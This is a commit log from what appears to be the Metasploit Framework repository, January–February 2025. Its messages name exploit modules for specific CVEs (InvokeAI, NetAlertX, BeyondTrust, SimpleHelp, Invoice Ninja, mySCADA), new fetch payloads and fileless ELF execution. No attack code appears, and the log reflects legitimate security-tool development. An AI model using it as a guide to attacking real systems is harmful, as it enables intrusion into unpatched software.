Compare commits

...

3330 Commits

Author SHA1 Message Date
EasyMoney322 aa5eda4876 Fix 404 link in eicar.txt (#19912)
Updated the link to EICAR's test-file as the old one returns 404
2025-02-27 16:17:10 +00:00
h00die 689fb49b6e correct password in hashes table (#19911) 2025-02-27 15:15:45 +00:00
jenkins-metasploit c1a81ebf5a automatic module_metadata_base.json update 2025-02-27 14:35:25 +00:00
Diego Ledda 7e0b3af790 Land #19879, Add MsDtypSecurityDescriptor to_sddl_text
Land #19879, Add MsDtypSecurityDescriptor to_sddl_text
2025-02-27 15:28:27 +01:00
Diego Ledda 8c24e98fdd Land #19902, Fix byte to int conversion in MsAdts
Land #19902, Fix byte to int conversion in MsAdts
2025-02-27 15:25:50 +01:00
Metasploit 1d801225df Bump version of framework to 6.4.52 2025-02-27 03:33:05 -06:00
jenkins-metasploit 5bb99d120f automatic module_metadata_base.json update 2025-02-26 19:30:51 +00:00
Spencer McIntyre c49b49bdcd Merge pull request #19893 from bwatters-r7/fix/loadmaster_priv_esc_cve
Remove errant CVE reference.
2025-02-26 14:24:09 -05:00
Spencer McIntyre d37039c08f Add tests for byte to int conversions 2025-02-26 09:29:35 -05:00
Spencer McIntyre b853168a89 Make common byte to int conversion functions 2025-02-26 09:29:30 -05:00
Spencer McIntyre fcee4db5d0 Reorder the buffer fields to match windows 2025-02-25 17:44:54 -05:00
jenkins-metasploit 0cbd4d1db2 automatic module_metadata_base.json update 2025-02-25 12:20:54 +00:00
Diego Ledda 8dd032e529 Land #19897, Invoice Ninja unauthenticated RCE (CVE-2024-55555) and Laravel Crypto Killer mixin
Land #19897, Invoice Ninja unauthenticated RCE (CVE-2024-55555) and Laravel Crypto Killer mixin
2025-02-25 13:14:18 +01:00
Diego Ledda 1c27e2a958 docs: update docs for rubocop 2025-02-25 12:15:52 +01:00
jenkins-metasploit b0cd258540 automatic module_metadata_base.json update 2025-02-25 11:10:14 +00:00
Diego Ledda f046e70b76 Land #19894, SimpleHelp Path Traversal CVE-2024-57727
Land #19894, SimpleHelp Path Traversal CVE-2024-57727
2025-02-25 12:00:34 +01:00
jenkins-metasploit 458d086fa6 automatic module_metadata_base.json update 2025-02-25 10:42:49 +00:00
msutovsky-r7 576ff2fb5c Land #19878, MyScada MyPro Manager Credential Harverster Module
mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module
2025-02-25 11:35:59 +01:00
Spencer McIntyre 3487b485e9 Fix an API change from an old commit (#19880) 2025-02-25 10:15:33 +00:00
jenkins-metasploit b55a945669 automatic module_metadata_base.json update 2025-02-25 09:50:00 +00:00
Diego Ledda 33d0c0c9fd Land #19881, NetAlertX File Read (CVE-2024-48766)
Land #19881, NetAlertX File Read (CVE-2024-48766)
2025-02-25 10:42:52 +01:00
Martin Sutovsky 183d5823cc Rollback of fix for check method 2025-02-25 10:21:31 +01:00
Jack Heysel e4ee651c9b Updated docs, fixed Notes 2025-02-24 10:26:01 -08:00
h00die-gr3y 79411eace8 added code sugesstions from dledda-r7 2025-02-24 15:51:32 +00:00
Martin Sutovsky fae3d8390a Calling check method fix & Additional documentation 2025-02-24 15:52:00 +01:00
H00die.Gr3y 2d55f5c16e Update documentation/modules/exploit/linux/http/invoiceninja_unauth_rce_cve_2024_55555.md
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2025-02-24 15:51:06 +01:00
Martin Sutovsky e883da86cc Adding report_vuln 2025-02-24 12:19:59 +01:00
Martin Sutovsky f7342139b4 Code refactor based on PR 2025-02-24 12:05:04 +01:00
h00die-gr3y 41e690445e simplified some code sections 2025-02-23 12:59:52 +00:00
h00die-gr3y ece33ee8ec added documentation 2025-02-23 09:54:26 +00:00
H00die.Gr3y b3a5da976b Apply suggestions from code review
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-02-22 10:35:45 +01:00
h00die-gr3y 47a2079d19 initial module and laravel crypto killer mixin 2025-02-21 18:09:28 +00:00
Jack Heysel fc25e177fc SimpleHelp Path Traversal CVE-2024-57727 2025-02-21 08:15:46 -08:00
jenkins-metasploit e7ed432159 automatic module_metadata_base.json update 2025-02-21 01:30:23 +00:00
Brendan e9fc6e3b27 Merge pull request #19841 from h00die-gr3y/raspberrymatic-unauth-rce
RaspberryMatic unauthenticated RCE (Zip Slip) [CVE-2024-24578]
2025-02-20 19:22:30 -06:00
h00die-gr3y 215957465c added default options and updated documentation 2025-02-20 13:19:41 -06:00
h00die-gr3y 15c20272ea removed linux dropper code and tested with PR 19850 2025-02-20 13:19:41 -06:00
h00die-gr3y fcc929e228 updated documentation with Linux Dropper (x86_64) target scenario 2025-02-20 13:19:41 -06:00
h00die-gr3y f857e5fe67 fixed code review and updated documentation 2025-02-20 13:19:41 -06:00
H00die.Gr3y 38b3741a15 Apply suggestions from code review
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-02-20 13:19:41 -06:00
h00die-gr3y 682be79920 first release module and documentation 2025-02-20 13:19:41 -06:00
h00die-gr3y baac1fc9d0 init commit module 2025-02-20 13:19:40 -06:00
Martin Sutovsky 2cdaf98c74 Fixing descriptions, filename, adding correct CVE and code reformat 2025-02-20 19:48:36 +01:00
msutovsky-r7 27120235d4 Merge branch 'rapid7:master' into netalert_file_read 2025-02-20 19:47:55 +01:00
Metasploit 3613013938 Bump version of framework to 6.4.51 2025-02-20 11:47:22 -06:00
jenkins-metasploit 42a7ff093d automatic module_metadata_base.json update 2025-02-20 16:20:32 +00:00
Brendan c7d59ce829 Merge pull request #19875 from dledda-r7/fix/aarch64-sigill-raspberrypi
Fix SIGILL on staged meterpreter on RaspberryPi4
2025-02-20 10:14:07 -06:00
h4x-x0r 0aad255e13 updated
updated
2025-02-20 15:40:05 +00:00
bwatters-r7 c8aea65c7a Remove errant CVE reference. 2025-02-20 08:19:23 -06:00
jenkins-metasploit 0b0b9bb68a automatic module_metadata_base.json update 2025-02-20 10:51:07 +00:00
Diego Ledda 4374484147 Land #19850, Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64, ppc64le
Land #19850, Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64, ppc64le
2025-02-20 11:43:17 +01:00
bwatters-r7 8cbcdd1f6c Add PPC64LE Fetch payloads 2025-02-19 18:10:55 -06:00
bwatters-r7 87ec9ee137 Remove CBEA64 arch values so PPC64 arches have only 1 arch value
Multiple arches broke payload adaptyers and we do not use them, anyway
2025-02-19 17:57:39 -06:00
dledda-r7 cdac13550b fix: sync syscall comment 2025-02-19 03:58:11 -05:00
jenkins-metasploit d626e56089 automatic module_metadata_base.json update 2025-02-19 01:40:04 +00:00
Brendan 66d657f385 Merge pull request #19810 from h00die/fix_loadmaster_2024
Fix loadmaster privesc check method and refs
2025-02-18 19:34:00 -06:00
Brendan e9d4a9d918 Merge pull request #19858 from msutovsky-r7/fileless_elf_execution
Fileless elf execution
2025-02-18 15:05:47 -06:00
Simon Janusz 8f00370370 Make datastore to_h sane (#19890)
* Bump metasploit_data_models gem

* Make datastore to_h sane
2025-02-18 15:54:53 +00:00
Martin Sutovsky 0d87703dd8 Land #19871, fixing ELF version in Aarch64 template 2025-02-18 15:43:25 +01:00
jenkins-metasploit d0000af09a automatic module_metadata_base.json update 2025-02-18 13:08:28 +00:00
Martin Sutovsky bd42b23ef0 Land #19883, module for unauthenticated RCE in InvokeAI 2025-02-18 14:01:11 +01:00
msutovsky-r7 f132b8ffe1 Update documentation/modules/auxiliary/scanner/http/netalertx_file_read.md
Co-authored-by: Takahiro Yokoyama <tkhr.y0k0yama@gmail.com>
2025-02-18 13:44:26 +01:00
msutovsky-r7 7cf02c5b14 Update modules/auxiliary/scanner/http/netalertx_file_read.rb
Co-authored-by: Takahiro Yokoyama <tkhr.y0k0yama@gmail.com>
2025-02-18 13:44:21 +01:00
Takahiro Yokoyama 6eaae79dc2 Update modules/exploits/linux/http/invokeai_rce_cve_2024_12029.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-02-18 21:21:19 +09:00
Takah1ro 32db7ee6ae Use plain payload 2025-02-18 08:22:15 +09:00
Takah1ro 3ce313ac89 Rubocop formatting 2025-02-18 08:14:56 +09:00
Takahiro Yokoyama a26572d318 Update modules/exploits/linux/http/invokeai_rce_cve_2024_12029.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-02-18 08:09:25 +09:00
jenkins-metasploit e60be7fcfb automatic module_metadata_base.json update 2025-02-17 16:51:25 +00:00
msutovsky-r7 05c9550d43 Land #19877, BeyondTrust Privileged Remote Access & Remote Support RCE Module
Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094)
2025-02-17 17:43:15 +01:00
sfewer-r7 65e2a20a5d We can remove this line as it is redundant. The regex that follows will check for the same thing as part of its matching expression. Thanks msutovsky-r7 for spoting this. 2025-02-17 16:33:11 +00:00
cgranleese-r7 2e9326897f Land #19887, Update reload_lib to ignore gemfiles 2025-02-17 14:14:02 +00:00
adfoster-r7 f16d31b7b1 Update reload_lib to ignore gemfiles 2025-02-17 13:50:41 +00:00
sfewer-r7 bb9013a8ee check the frame for nil 2025-02-17 12:29:50 +00:00
cgranleese-r7 80922124c8 Land #19884, Add osvdb search to msfconsole 2025-02-17 12:19:52 +00:00
sfewer-r7 6f1287d899 add in some logic to detect potentially failed exploitation due to the patch being applied, warning a user of a WebSocket getting closed unexpectadly 2025-02-17 12:17:15 +00:00
sfewer-r7 fbef2baf5c remove the uneeded parenthesis and make rubocop happy. 2025-02-17 11:44:50 +00:00
sfewer-r7 c950264a85 Add some comments in the check routine to note theres is no known lower bound version number, and the patch does not change the version number. 2025-02-17 11:35:22 +00:00
Stephen Fewer ed54130346 Explicitly close the WebSocket connection
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-02-17 11:35:03 +00:00
Takah1ro 611556571f Update document 2025-02-17 20:32:43 +09:00
dwelch-r7 19c6cd899c Land #19885, Improve module search performance 2025-02-17 11:27:54 +00:00
adfoster-r7 a66981f9e7 Improve module search performance 2025-02-17 11:08:42 +00:00
adfoster-r7 3f85d6d46d Add osvb search to msfconsole 2025-02-17 10:06:39 +00:00
Stephen Fewer 130895671f Remove a duplicate work in this comment (Thanks jvoisin)
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-02-17 09:46:59 +00:00
Stephen Fewer 6ed60547a3 Print the actual status code in the error message (Thanks msutovsky-r7)
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-02-17 09:43:46 +00:00
Stephen Fewer eb1feba767 Fix typo in comment (Thanks jvoisin)
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-02-17 09:42:50 +00:00
Takah1ro b454a32f3c Fix typo and update document 2025-02-17 12:52:50 +09:00
Martin Sutovsky dddcdccbef Fixing generating certutil fetch command 2025-02-16 20:31:24 +01:00
msutovsky-r7 e284ea5dc7 Merge branch 'rapid7:master' into fileless_elf_execution 2025-02-16 20:01:15 +01:00
Takah1ro 0945fbba81 Add InvokeAI unauth RCE module (CVE-2024-12029) 2025-02-16 15:49:56 +09:00
msutovsky-r7 b647aec3cb Merge pull request #2 from bwatters-r7/collab/19858
Slight fixes and prep for adding piped fetch payloads
2025-02-14 16:06:27 +01:00
Martin Sutovsky 00d4feb2b5 Adding documentation, file renaming 2025-02-14 14:43:43 +01:00
sfewer-r7 2d858ac1f0 Improve the auto discovery of the target site info. We can query an undocumented API endpoint to discover the target site company name. 2025-02-14 09:38:13 +00:00
Martin Sutovsky f44620939f Adding module for NetAlertX File Read 2025-02-14 10:35:05 +01:00
dledda-r7 80b76e4f5f docs: add reference to the pull-request inside source 2025-02-14 04:33:06 -05:00
Spencer McIntyre 48c4ce56e4 Raise a specific error and update specs 2025-02-14 01:42:22 -05:00
Spencer McIntyre c9dc97c242 Update some modules to print the SDDL 2025-02-13 17:19:43 -05:00
Spencer McIntyre c979d8d477 Add the #to_sddl_text method for security descriptors 2025-02-13 17:19:37 -05:00
h4x-x0r 5a9df32e14 update 2025-02-13 21:45:29 +00:00
bwatters-r7 46e97e3776 Slight fixes and prep for adding piped fetch payloads 2025-02-13 11:35:06 -06:00
sfewer-r7 9fc8b3b0dc fix a typo 2025-02-13 15:12:23 +00:00
sfewer-r7 90daccd948 add in link to AKB analysis 2025-02-13 15:10:41 +00:00
simonirwin-r7 d9cb3651f4 PD-49865 set Cortex tags to identify repo exposure (#19876) 2025-02-13 14:46:33 +00:00
sfewer-r7 d93a99c504 rename the module 2025-02-13 12:51:46 +00:00
Metasploit 9dac85e3c9 Bump version of framework to 6.4.50 2025-02-13 03:34:13 -06:00
Brendan 7b4678564a Update modules/payloads/adapters/cmd/linux/https/ppc64.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-02-12 15:52:15 -06:00
Brendan 3465b57e48 Update modules/payloads/adapters/cmd/linux/tftp/ppc64.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-02-12 15:52:08 -06:00
Brendan b7dd63f0a9 Update modules/payloads/adapters/cmd/linux/tftp/ppc.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-02-12 15:52:03 -06:00
Brendan c098665a2e Update modules/payloads/adapters/cmd/linux/http/ppc64.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-02-12 15:51:57 -06:00
Brendan 6424a4a387 Update modules/payloads/adapters/cmd/linux/http/ppc.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-02-12 15:51:49 -06:00
bwatters-r7 4e5a21bfab Update payload cache size 2025-02-12 13:40:34 -06:00
sfewer-r7 18f0bbeaf0 add in the new CVE ID for the PosgreSQL vuln 2025-02-12 17:23:19 +00:00
sfewer-r7 37276446a6 improve the description for this option 2025-02-12 17:22:43 +00:00
sfewer-r7 c9be9b65ec fix typos in docs 2025-02-12 17:22:17 +00:00
dledda-r7 d22ed19b02 fix: fix port number offset 2025-02-12 11:49:35 -05:00
dledda-r7 4876320814 fix: add sync syscall after read to prevent sigill in raspberrypi 2025-02-12 11:33:45 -05:00
h00die a5d7dfb139 Merge pull request #19870 from jmartin-tech/fix/expand-data-workflow-perms
allow workflow content write
2025-02-12 08:14:32 -05:00
jenkins-metasploit 10a3b267b8 automatic module_metadata_base.json update 2025-02-11 22:21:40 +00:00
Spencer McIntyre a9ab6668a4 Merge pull request #19873 from adfoster-r7/remove-report-note-calls-from-vuln-cert-finder
Remove report note calls from vuln cert finder
2025-02-11 17:15:25 -05:00
Spencer McIntyre 31b8fad08f Allow SIDs to be set by strings 2025-02-11 17:00:46 -05:00
adfoster-r7 0fefe063ad Remove report note calls from vuln cert finder 2025-02-11 21:21:55 +00:00
bwatters-r7 d031df5b6b Change the aarch64 elf version in template file and reassemble 2025-02-11 08:47:14 -06:00
jenkins-metasploit 517bf5481d automatic module_metadata_base.json update 2025-02-11 08:32:04 +00:00
Martin Sutovsky 984f0dbb15 Land #19868, NetAlertX RCE module 2025-02-11 08:23:57 +01:00
Jeffrey Martin 13df710797 allow content write
To enabled branch and commit `content` must be added
2025-02-10 22:26:04 -06:00
Takah1ro 2db7f4f186 Use BadChars and Base64Decoder 2025-02-11 11:25:24 +09:00
Takahiro Yokoyama edbdb985e3 Apply suggestions from code review
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-02-11 08:59:37 +09:00
adfoster-r7 9396e1c91b Merge pull request #19869 from adfoster-r7/consolidate-datastore-with-fallbacks-logic
Consolidate datastore with fallbacks logic
2025-02-10 19:10:17 +00:00
msutovsky-r7 d96d980a24 Land #19846, module for CVE-2024-47407 MySCADA MyPro Manager
mySCADA MyPRO Manager Command Injection (CVE-2024-47407) Module
2025-02-10 16:25:32 +01:00
Takah1ro 9f43fcc7ad Update FETCH_COMMAND default to curl 2025-02-10 22:00:52 +09:00
Takah1ro 8d59201447 Update document 2025-02-10 21:38:14 +09:00
Takah1ro 7149d3f332 Leave cleanup as an option 2025-02-10 21:31:50 +09:00
Takah1ro 92a73b1fed Fix after applying suggestions 2025-02-10 21:18:19 +09:00
Takahiro Yokoyama 127adda3df Update modules/exploits/linux/http/netalertx_rce_cve_2024_46506.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-02-10 21:06:50 +09:00
Takah1ro b02838a8dd NetAlertx -> NetAlertX 2025-02-10 12:52:26 +09:00
adfoster-r7 8e9c144e2c Consolidate datastore with fallbacks logic 2025-02-09 20:26:52 +00:00
Martin Sutovsky 881ae72550 Optimizing execution of fetch command in bash 2025-02-09 09:17:19 +01:00
Takah1ro 4f584bd5a4 Use cron restart 2025-02-08 17:35:55 +09:00
Takah1ro 00f4f80530 Add NetAlertx rce module (CVE-2024-46506) 2025-02-08 14:40:31 +09:00
h4x-x0r 85875d8338 Removed ampersand
Removed ampersand
2025-02-08 02:30:57 +00:00
h4x-x0r 41a0e089ea CVE-2025-24865 & CVE-2025-22896
CVE-2025-24865 & CVE-2025-22896
2025-02-08 02:22:11 +00:00
Simon Janusz 300e99db01 Land #19867, Update nokogiri dependency
Update nokogiri dependency
2025-02-07 16:48:26 +00:00
adfoster-r7 ad8c1c3f43 Update nokogiri dependency 2025-02-07 16:26:52 +00:00
Martin Sutovsky dfb1ed6d30 Land #19842, fixing jtr_format for NTLM hashes 2025-02-07 13:24:10 +01:00
adfoster-r7 94c1167515 Merge pull request #19829 from cgranleese-r7/updates-meterpeter-pipeline-to-build-payloads-gem
Updates `shared_meterpreter_acceptance.yml` pipeline to build the metasploit-payloads gem
2025-02-07 12:05:01 +00:00
Martin Sutovsky ed648e9eca Adding more reliable fileless fetch payload 2025-02-07 10:12:28 +01:00
jheysel-r7 cddfb499b7 Merge pull request #19864 from jmartin-tech/fix/restrict-workflow-to-r7
Restrict weekly data PR tooling to rapid7 repo
2025-02-06 11:15:31 -08:00
jheysel-r7 6861b1fb67 Merge pull request #19729 from sempervictus/bug/shell_command_overlap
Fix overlap of shell built-in commands with host's
2025-02-06 10:27:12 -08:00
Martin Sutovsky 6d073540e8 More elegant way of generating fileless payload, code refactor based on comments 2025-02-06 19:22:36 +01:00
Jeffrey Martin 6da074e164 Restrict weekly PR tooling to rapid7 repo 2025-02-06 09:27:40 -06:00
jenkins-metasploit 7112fb27e6 automatic module_metadata_base.json update 2025-02-06 14:06:13 +00:00
Brendan 853b42cfaf Merge pull request #19851 from zeroSteiner/feat/mod/adcs-cert-template-flags
Parse and display the flags field
2025-02-06 08:00:02 -06:00
Martin Sutovsky 50c95af7e0 Refactoring fileless execution, adjusting generating fetch commands 2025-02-06 11:28:05 +01:00
Metasploit 05a2e9dc9f Bump version of framework to 6.4.49 2025-02-06 03:32:51 -06:00
jheysel-r7 deef85deb6 Merge pull request #19779 from h00die/action_update_weekly
Weekly Updater Action
2025-02-05 10:10:30 -08:00
jenkins-metasploit 7f5f459c86 automatic module_metadata_base.json update 2025-02-05 17:51:07 +00:00
jheysel-r7 476ad5bb94 Merge pull request #19856 from bwatters-r7/update/esc8-auto-dc
Change behavior of esc8 'AUTO' mode to attempt to get a cert based on DC and Machine types
2025-02-05 09:44:47 -08:00
Martin Sutovsky e3bb4791e1 Refactoring based on comments 2025-02-05 13:55:58 +01:00
Martin Sutovsky 0d558a1f71 Fileless execution condition specified 2025-02-05 09:08:34 +01:00
Martin Sutovsky b678126361 Code factor, adding comments 2025-02-05 07:33:42 +01:00
h00die e6fb4f876e Update .github/workflows/weekly-data-and-external-tool-updater.yml
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-02-04 16:45:40 -05:00
bwatters-r7 7e8c35257e Update docs, fix space in module 2025-02-04 15:41:33 -06:00
Diego Ledda f22295b10f Land #19857, Ivanti HTTP Module fix
Land #19857, Ivanti HTTP Module fix
2025-02-04 19:08:41 +01:00
Martin Sutovsky a2044acc42 Bug fixed 2025-02-04 15:38:59 +01:00
Martin Sutovsky b98fb7553d Adding FETCH_FILELESS option 2025-02-04 13:26:50 +01:00
msutovsky-r7 20d2a6c7a7 Merge branch 'rapid7:master' into fileless_elf_execution 2025-02-04 09:47:02 +01:00
Martin Sutovsky 6ab32cde32 Ivanti HTTP Module fix based on remaining comments 2025-02-04 07:24:10 +01:00
bwatters-r7 3f8db70d45 Change behavior of 'AUTO' mode to attempt to get a cert based on DomainController and Machine templates 2025-02-03 17:10:31 -06:00
Spencer McIntyre 0caaa5d655 Parse and display the flags field 2025-02-03 17:29:33 -05:00
jenkins-metasploit 90ad8b66d8 automatic module_metadata_base.json update 2025-02-03 20:49:51 +00:00
jheysel-r7 652fbf1a62 Merge pull request #19813 from h00die/local_version_patch
guard Rex::Version.new against crashes on local modules
2025-02-03 12:43:37 -08:00
jenkins-metasploit 4aedaaa222 automatic module_metadata_base.json update 2025-02-03 17:24:03 +00:00
Diego Ledda ba8d5b7f5a Land #19844, Add Ivanti Connect Secure HTTP Login Module
Land #19844, Add Ivanti Connect Secure HTTP Login Module
2025-02-03 18:17:36 +01:00
msutovsky-r7 46d2d4c63d Update lib/metasploit/framework/login_scanner/ivanti_login.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2025-02-03 18:05:54 +01:00
Martin Sutovsky 834e499b2a Adding check for presence of logout token 2025-02-03 16:44:01 +01:00
Martin Sutovsky 09db1f4e72 Adding documentation 2025-02-03 15:29:49 +01:00
Martin Sutovsky f06a2d47f8 Code refactor, merging classes into one 2025-02-03 06:34:49 +01:00
jenkins-metasploit 88ba2de1be automatic module_metadata_base.json update 2025-01-31 23:07:31 +00:00
jheysel-r7 f3eefc0d7e Merge pull request #19849 from zeroSteiner/feat/mod/ldap/esc-finder-updates
AD CS Workflow Related Changes
2025-01-31 15:00:14 -08:00
jenkins-metasploit ec9edc5d6c automatic module_metadata_base.json update 2025-01-31 22:05:36 +00:00
jheysel-r7 373ea48838 Merge pull request #19847 from TheBigStonk/argus_dvr_4_lfi_cve_2018_15745
Argus LFI Auxiliary Module with Associated Doc (CVE-2018-15745)
2025-01-31 13:59:27 -08:00
jheysel-r7 6f945ca1ce Merge pull request #19837 from adfoster-r7/fix-task-service-tracking-bug
Fix task service tracking bug
2025-01-31 13:56:00 -08:00
jheysel-r7 917196b8a1 Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb 2025-01-31 12:49:35 -08:00
jheysel-r7 7259548cb9 Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb 2025-01-31 11:52:00 -08:00
Spencer McIntyre 0013db1822 Fix a regression in the loop logic 2025-01-31 14:48:57 -05:00
Spencer McIntyre f8dfaae599 Guard FQDN lookup logic a bit more
Use DNS first, then fail back to LDAP
2025-01-31 09:42:22 -05:00
sfewer-r7 c6d03069a9 add in the documentation 2025-01-31 11:02:01 +00:00
sfewer-r7 d887ab5fac add in module option to leverage CVE-2024-12356. This option is disabled by default, and we hit the SQLi directly. 2025-01-31 10:01:02 +00:00
TheBigStonk 2003ed7fd0 Fixed changes from rubocop linting 2025-01-31 22:55:32 +13:00
sfewer-r7 528409ba87 add in the exploit for cve-2024-12356 2025-01-31 09:20:54 +00:00
TheBigStonk 3170849147 Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
Adding in RPORT default option

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-01-31 11:21:48 +13:00
TheBigStonk 6f2ff5110e Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
awesome cutting this one out then :)

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-01-31 11:20:22 +13:00
TheBigStonk 7adff997d2 Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
TIL, thanks

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-01-31 11:19:00 +13:00
TheBigStonk cf9e80aa1e Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
Good spot

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-01-31 11:15:53 +13:00
TheBigStonk 48921cadb6 Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
Apologies for that this is my first module. Yeah want to make sure John Page is given appropriate kudos.

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-01-31 11:14:51 +13:00
TheBigStonk 22818f07fa Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
Oh cool, I'm new-ish to Ruby. Prefer this :)

Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2025-01-31 11:11:34 +13:00
bwatters-r7 1d3bbcb573 Add specs to pass tests 2025-01-30 14:36:23 -06:00
bwatters-r7 cf5f518590 Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 2025-01-30 13:51:05 -06:00
Spencer McIntyre 61a0981013 Update the spec to accept the failure 2025-01-30 14:43:50 -05:00
Martin Sutovsky 37bfe9368b Addressing comments from pull request 2025-01-30 13:01:40 +01:00
TheBigStonk d67dcda2c6 Added Argus LFI Module and Docs 2025-01-31 00:23:34 +13:00
Metasploit 64be670dfa Bump version of framework to 6.4.48 2025-01-30 03:32:46 -06:00
Spencer McIntyre 5c2056b2e1 Update kerberos/get_ticket to return values 2025-01-29 16:34:25 -05:00
Spencer McIntyre 441b671edd Update to include return values 2025-01-29 16:34:25 -05:00
Spencer McIntyre 210b780f83 Refactor reporting template permissions 2025-01-29 16:34:25 -05:00
Spencer McIntyre e072468042 Some adjustments for ESC4 compatibility with MSP 2025-01-29 16:34:25 -05:00
Spencer McIntyre 7b03844312 Consolidate the report details 2025-01-29 16:34:25 -05:00
Spencer McIntyre 1aa4a1f8c8 Resolve the CA address via DNS records in LDAP 2025-01-29 16:34:25 -05:00
Spencer McIntyre f0f1aa9eb3 Add initial MsDnsp data structures 2025-01-29 16:34:25 -05:00
Spencer McIntyre 3fb94b46c4 Update the ESC finder module's reporting 2025-01-29 16:34:25 -05:00
jenkins-metasploit 7d1c008377 automatic module_metadata_base.json update 2025-01-29 21:19:01 +00:00
jheysel-r7 aa78924f67 Merge pull request #19843 from cdelafuente-r7/fix/mod/ldap_smb_login
Fix ldap_login and smb_login
2025-01-29 13:12:46 -08:00
h4x-x0r 21b3315229 updated
updated
2025-01-29 20:18:05 +00:00
Martin Sutovsky 7ebd4f34ef Adding Ivanti Connect Secure HTTP Login Scaner Module 2025-01-29 15:29:47 +01:00
Christophe De La Fuente 1885b650ba Fix ldap_login and smb_login 2025-01-29 11:10:30 +01:00
jenkins-metasploit 157763b2af automatic module_metadata_base.json update 2025-01-28 21:07:20 +00:00
jheysel-r7 6232463701 Merge pull request #19835 from cdelafuente-r7/fix/kerberos/ticket_lookup
Kerberos ticket lookup fix
2025-01-28 13:01:05 -08:00
Jack Heysel 8e68d1d5f2 Fixed spacing 2025-01-28 10:40:13 -08:00
Jack Heysel 9d50fb66bc Fix jtr_format assignment in HashCapture module 2025-01-28 10:14:36 -08:00
cgranleese-r7 1b50e60a26 Updates meterpreter pipeline to now build the payloads gem 2025-01-28 10:41:14 +00:00
Spencer McIntyre 936e0dfb75 Merge pull request #19833 from cdelafuente-r7/fix/mod/petitpotam
Fix PetitPotam UUID when using EsfRPC with `lsarpc` named pipe
2025-01-27 13:09:14 -05:00
adfoster-r7 fcee7a5972 Rollback origin support for vulns 2025-01-27 12:44:58 +00:00
Christophe De La Fuente b3c2ae4f51 Move EfsrpcOverLsarpc module under the MetasploitModule class 2025-01-27 08:35:00 +01:00
jenkins-metasploit 589b9067e6 automatic module_metadata_base.json update 2025-01-26 17:05:58 +00:00
adfoster-r7 fbe9edfa0c Merge pull request #19836 from 0xAryan/nibbleblog_link_fix
Link fix for exploit/multi/http/nibbleblog_file_upload
2025-01-26 16:59:14 +00:00
0xAryan ddf07a3d60 Link fix for exploit/multi/http/nibbleblog_file_upload 2025-01-26 19:20:12 +05:30
jenkins-metasploit f6e49e43c7 automatic module_metadata_base.json update 2025-01-24 20:43:24 +00:00
Spencer McIntyre 4a8ad46249 Merge pull request #19816 from jheysel-r7/esc_4_detection
Add ESC4 detection to ldap_esc_vulnerable_cert_finder module
2025-01-24 15:37:10 -05:00
jenkins-metasploit 93d16732f2 automatic module_metadata_base.json update 2025-01-24 17:57:22 +00:00
jheysel-r7 bd45ae36a8 Merge pull request #19826 from zeroSteiner/fix/mod/ldap-query/run-single-base
Update ldap_query datastore option usage
2025-01-24 09:50:57 -08:00
adfoster-r7 47fe31754e Merge pull request #19834 from sfewer-r7/fix-http_client-websockets
Fix Exploit::Remote::HttpClient#connect_ws to be spec compliant
2025-01-24 16:43:17 +00:00
Stephen Fewer 4c0f407b39 favor SecureRandom.bytes over Rex::Text.rand_text_alphanumeric
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2025-01-24 16:15:16 +00:00
Jack Heysel 105559e771 Remove typo 2025-01-24 07:35:12 -08:00
sfewer-r7 de6b14e506 change how a Sec-WebSocket-Key is computed to make connect_ws be spec compliant 2025-01-24 14:46:52 +00:00
Christophe De La Fuente 25bd5d736c Fix comparision case for service name hostname 2025-01-24 14:26:58 +01:00
Christophe De La Fuente 45e6daea7d Use the correct UUID when using EsfRPC with lsarpc namedpipe 2025-01-24 11:01:15 +01:00
